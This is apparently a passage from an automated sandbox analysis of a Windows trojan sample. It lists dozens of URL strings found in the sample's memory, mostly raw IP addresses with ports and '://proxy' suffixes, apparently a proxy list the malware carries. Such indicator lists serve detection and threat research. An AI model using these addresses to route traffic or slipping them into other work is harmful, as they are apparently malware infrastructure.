                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.217.226.45
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.217.226.45://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.217.226.45:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.217.226.46
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.217.226.46://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.217.226.46:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.217.226.47
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.217.226.47://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.217.29.198://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.217.29.198x
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.218.224.35
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.218.224.35://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.218.224.35:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.218.57.64
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C65FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.218.57.64://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C65FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.218.57.64:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.218.57.65
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.218.57.65://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CC0E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.218.57.66
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBEFD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.218.57.66://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBEFD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.218.57.66:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.218.57.67
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.218.57.67://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.218.57.67:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C65B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.218.57.68
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C677C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.218.57.68://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.218.57.69
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.218.57.69://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.218.57.70
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.218.57.70://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.218.57.70:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB346000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.218.57.71
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB346000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.218.57.71://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB125000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.218.57.74
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB125000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.218.57.74://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB125000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.218.57.74:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.220.168.134
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.220.168.134://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.221.230.186
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.221.230.186://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.221.230.186:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBDD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.221.74.130
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBDD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.221.74.130://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBDD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.221.74.130:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.222.245.40
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.222.245.40://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.222.245.41
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C75E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.222.245.41://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.222.245.42
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.222.245.42://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7DA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.222.245.43
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7DA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.222.245.43://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.222.245.44
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.222.245.44://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.222.245.44:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.222.245.45
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.222.245.45://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.222.245.46
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.222.245.46://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.222.245.46:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.222.245.47
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.222.245.47://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.222.245.47:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.222.245.50
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.222.245.50://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.222.245.50:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBAEF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.223.239.183
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBA8A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.223.239.183://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBA8A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.223.239.183:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.223.239.185
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.223.239.185://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.223.239.185:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.223.246.226
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7F92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.223.246.226://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.223.38.6
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.223.38.6://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.223.38.6:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C694D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.230.222.202
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7687000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.230.222.202://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C68A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.230.222.202:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.231.0.43:4481
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.231.0.43:4481://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.231.104.58
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.231.104.58://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.231.110.26
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.231.110.26://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.231.110.26:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C83D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.231.172.74
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C83D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.231.172.74://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBAEF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.233.111.162:32100
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBAEF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.233.111.162:32100://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.234.24.129:32100
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.234.24.129:32100://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.237.207.186
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7DA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.237.207.186://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.237.207.186:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.239.72.16
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.239.72.16://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.239.72.16:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.239.72.17
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.239.72.17://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.239.72.17:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.239.72.18
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.239.72.18://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.239.72.18:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.239.72.19
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.239.72.19://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.239.72.19:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C8415000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.62.134.139:36916
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C8415000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.62.134.139:36916://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBDF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.62.134.139:62607
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBDF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.62.134.139:62607://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C8296000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7ECD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.63.12.101:10647
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7ECD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.63.12.101:10647://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.63.12.101:2953
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.63.12.101:2953://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.63.12.101:32423
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.63.12.101:32423://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.63.12.101:3580
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.63.12.101:3580://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.63.12.101:61797
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.63.12.101:61797://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C770F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.63.12.33:14738
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C770F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.63.12.33:14738://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C65B5000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C677C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.63.12.33:23065
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C65B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.63.12.33:23065://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6F32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.63.12.33:23859
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6F32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.63.12.33:23859://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.63.12.33:30920
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.63.12.33:30920://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.63.12.33:30920x
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C677C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.63.12.33:34644
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C677C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.63.12.33:34644://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.63.12.33:40838
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.63.12.33:40838://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.63.12.33:50781
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.63.12.33:50781://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB025000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C94C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.63.12.33:58507
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9164000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.63.12.33:58507://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.63.12.33:61464
